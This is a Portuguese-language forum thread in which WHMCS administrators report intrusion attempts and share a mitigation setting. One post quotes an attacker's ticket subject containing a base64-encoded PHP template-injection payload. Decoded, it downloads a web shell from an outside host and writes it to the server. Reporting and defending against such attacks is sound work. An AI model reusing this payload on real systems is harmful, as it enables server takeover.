Ir para conteúdo
  • Cadastre-se

Tentativas de invasão em meu WHMCS


Posts Recomendados

+ 1 para coleção

Departamento: Abuse e SPAM

Assunto: {php}eval(base64_decode('JGNvZGUgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2Jsb2dnZXIuY29tLnRlcm5hdGVrb3RhLmdvLmlkL3RleHQvd3NvYjIucGhwJyk7CiRmbyA9IGZvcGVuKCJ3c29iMi5waHAiLCJ3Iik7CmZ3cml0ZSgkZm8sJGNvZGUpOw==')){/php}

Prioridade: Medium

IP: 103.10.64.30

IP Country: id.png Indonesia

-------------------------

Lembrando que ele so conseguiu criar o ticket, porque o departamento estava livre para criar tickets para não clientes.

Permitir abertura de tickets no departamento somente para clientes registrados.

Opções/Suporte/Departamentos de Suporte, edite o departamento desejado e ative

(Permitir abertura de tickets nesse departamento somente por clientes registrados)

Link para o comentário
Compartilhar em outros sites

Há alguns dias atrás recebi no meu sistema diversos cadastros (76 para ser mais exato) com três IP's diferentes vindos do Japão em dois dias, nos primeiros até tentamos contatar os responsáveis pelos registros mas não obtivemos nenhuma resposta. Não sei ao certo se isso foi uma tentativa de invasão mas foi um caso atípico

Link para o comentário
Compartilhar em outros sites

Pessoal, por que isso esta acontecendo? Simples, os códigos para invasão foram todos divulgados publicamente, aqui no fórum, então o "palhaço" que esta tentando invadir, pegou os códigos aqui no fórum e saiu enviando para todas as empresas. Esses códigos jamais deveriam ser publicados assim.

Link para o comentário
Compartilhar em outros sites

Visitante
Este tópico está impedido de receber novos posts.
  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Concorda com os nossos termos?